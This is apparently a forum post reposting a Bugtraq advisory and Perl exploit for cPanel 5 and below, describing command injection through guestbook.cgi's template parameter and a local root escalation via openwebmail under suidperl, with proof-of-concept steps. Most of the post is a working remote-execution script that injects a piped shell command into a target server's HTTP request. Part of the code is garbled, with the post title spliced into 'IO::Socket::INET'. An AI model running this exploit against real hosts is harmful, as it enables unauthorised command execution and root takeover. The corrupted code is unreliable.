Cpanel 5 remote execution exploit ...

Here is a little piece of code I found on bugtraq is an apparent cpanel exploit ?!?

Disclaimer: I did not write this code, nor did I find this hole(?), however, I am posting it simply as heads up. If you want to validate this on your own servers ... it's up to you.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug Founded by: pokleyzz
#
# Cpanel is web hosting control panel which allow client manage their web account through
# web interface. Most of the application are written in perl and compiled to binary.
#
# Details
# =======
# There is multiple vurnerabilities in this package as describe below.
#
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is classic perl open function vulnerability in template variable which allow any
# user to read any file or run command as valid system user which assign to specific url
# in apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel come with openwebmail packages as one of web base email reader which suid root.
# In the system with suid perl install perfectly (with suid mode turn on) local user may
# include their own perl script when running openwebmail script (oom) through suidperl.
#
# Openwebmail will append perl include path (@INC) through SCRIPT_FILENAME environment variable,
# then include some file when execute.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create file openwebmail-shared.pl contain perl script you want to execute.
# ii) Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.
# iii) exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng p0ng@brasnet.org

$url = $ARGV[0];
$cmd = $ARGV[1];

if(@ARGV != 2){
print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
print " use %20 for spaces.\n";
print " usage: $0 <host> <cmd>\n";
exit;
}

use IO:Cpanel 5 remote execution exploit ...ocket::INET;
$rem = IO:Cpanel 5 remote execution exploit ...ocket::INET->new(
Proto => "tcp",
PeerAddr => $url,
PeerPort => "80");

if ($rem) {
print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
@resp = <$rem>;
}
print "@resp\n\n";

 

 

 

 

Top